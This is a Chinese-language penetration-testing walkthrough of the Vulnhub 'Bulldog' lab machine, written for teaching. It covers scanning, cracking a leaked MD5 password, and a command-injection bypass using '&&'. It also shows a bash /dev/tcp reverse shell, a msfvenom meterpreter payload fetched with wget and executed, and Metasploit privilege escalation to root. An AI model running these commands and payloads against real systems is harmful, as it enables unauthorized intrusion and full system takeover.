简单打靶场之bulldog
字数 1126 2025-08-12 11:34:37
Bulldog靶场渗透测试教学文档
0x01 环境搭建
靶场下载
- 下载地址: https://www.vulnhub.com/entry/bulldog-1,211/
- 靶机类型: Vulnhub虚拟机
常见问题解决
- IP地址获取问题: 参考《vulnhub靶机无法获取IP地址解决办法》(redwand的博客-CSDN博客)
0x02 靶场渗透流程
1. 主机发现
sudo netdiscover -r 192.168.91.0/24
发现靶机IP: 192.168.91.156
2. 端口扫描
nmap -T4 -sC -sV -p- 192.168.91.156
使用Nmap进行全端口扫描,获取服务信息
3. 辅助扫描工具
- fscan:
fscan32.exe -h 192.168.91.156 - Goby: 图形化扫描工具
4. Web目录扫描
使用dirsearch发现有用路径:
- http://192.168.91.156/dev/
- http://192.168.91.156/robots.txt
- http://192.168.91.156/admin/login
5. 信息收集
- 访问/dev/目录并查看源代码
- 发现员工邮箱和MD5加密的密码注释
- 使用cmd5.com在线解密MD5密码
6. 登录尝试
- 使用账号: nick
- 密码: bulldog (解密获得)
- 成功登录: http://192.168.91.156:8080/admin/
7. WebShell绕过
- 输入框有命令限制,非允许命令会显示"黑客行为"
- 使用
&符号绕过:ls&&whoami
8. 反弹Shell尝试
# Kali监听
nc -nlvp 6666
# 尝试URL编码后的反弹Shell命令
echo "bash -i >& /dev/tcp/192.168.91.156/6666 0>&1" | bash
失败,返回500错误
9. MSF后门利用
# 生成Linux后门
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.91.154 LPORT=4444 -f elf > shell.elf
# 启动HTTP服务
python -m http.server 8080
# MSF监听设置
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.91.154
set LPORT 4444
run
10. 靶机下载执行
# URL编码后执行
pwd&wget http://192.168.91.154:8080/shell.elf
pwd&&chmod +x shell.elf
pwd&&./shell.elf
成功获取Meterpreter会话
11. 提权
# 查找可用提权模块
run post/multi/recon/local_exploit_suggester
# 发现多个漏洞:
1. exploit/linux/local/bpf_sign_extension_priv_esc
2. exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
3. exploit/linux/local/glibc_realpath_priv_esc
4. exploit/linux/local/pkexec
5. exploit/linux/local/su_login
# 使用第一个漏洞提权
use exploit/linux/local/bpf_sign_extension_priv_esc
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set session 2
run
成功提权至root
0x03 经验总结
- 源代码检查: 在dirsearch扫描后,查看网页源代码发现关键信息(MD5加密密码)
- 命令绕过技巧: 使用
&符号绕过受限命令执行 - 多种渗透途径: 当直接反弹Shell失败时,采用MSF后门方式成功获取控制权
- 自动化工具辅助: 使用local_exploit_suggester快速识别可用提权漏洞
关键知识点
- 信息收集: 网络扫描、目录爆破、源代码审查
- 密码破解: MD5在线解密
- Web应用绕过: 受限命令执行绕过技术
- 后门利用: MSFVenom生成、传输和执行
- 权限提升: Linux本地提权漏洞利用
工具清单
- 网络扫描: netdiscover, nmap
- Web扫描: dirsearch, fscan, Goby
- 密码破解: cmd5.com
- 后门生成: msfvenom
- 监听控制: nc, Metasploit
- 提权检测: local_exploit_suggester